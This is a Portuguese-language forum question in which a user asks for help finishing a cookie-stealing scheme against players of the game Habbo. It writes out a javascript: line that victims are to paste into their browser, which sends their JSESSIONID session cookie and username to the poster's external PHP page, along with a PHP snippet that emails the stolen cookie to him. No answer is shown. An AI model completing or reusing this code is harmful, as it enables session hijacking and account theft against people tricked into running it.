Ir para conteúdo
Fórum Script Brasil
  • 0

Dúvida! URGENTE :S


Blowtorch

Pergunta

Olá! Preciso fazer um trabalho pessoal mas não estou conseguindo.

É o seguinte, preciso do código em PHP que após colar um JavaScript no navegador, ele envie o link contido no navegador, seria mais ou menos assim:

java script:location.href='http://mesopotaniodesign.orgfree.com/bina.php?cookie='+Cookie.get('JSESSIONID''>http://mesopotaniodesign.orgfree.com/bina.php?cookie='+Cookie.get('JSESSIONID')+'&habbo='+habboName;void(0);

Este é o codigo que a pessoa vai colar no navegador no caso no jogo Habbo.

http://mesopotaniodesign.orgfree.com/bina.php

Dentro deste site tem que ter o TAL DE PHP para que depois de colar o código e dar enter enviar oque aparecerá para meu e-mail.

O código que tenho é:

<?php

$cookie = $HTTP_GET_VARS["cookie"];

mail("G57.owned@gmail.com", $cookie);

?>

Este é o código que preciso para botar dentro da página: bina.php , que após colar o JavaScript e dar enter envie as infos, que por exemplo seriam:

http://mesopotaniodesign.orgfree.com/bina.php?cookie=G3748FKD90263HDGE748EK9475NSJ27F1.resin-fe-1&habbo=Mesopotanio

Desde já Grato!

Qualquer coisa me adicione no MSN: mesopotanio@live.com ou me mande um e-mail: mesopotanio@gmail.com

Link para o comentário
Compartilhar em outros sites

1 resposta a esta questão

Posts Recomendados

Participe da discussão

Você pode postar agora e se registrar depois. Se você já tem uma conta, acesse agora para postar com sua conta.

Visitante
Responder esta pergunta...

×   Você colou conteúdo com formatação.   Remover formatação

  Apenas 75 emoticons são permitidos.

×   Seu link foi incorporado automaticamente.   Exibir como um link em vez disso

×   Seu conteúdo anterior foi restaurado.   Limpar Editor

×   Você não pode colar imagens diretamente. Carregar ou inserir imagens do URL.



  • Estatísticas dos Fóruns

    • Tópicos
      152,2k
    • Posts
      652k
×
×
  • Criar Novo...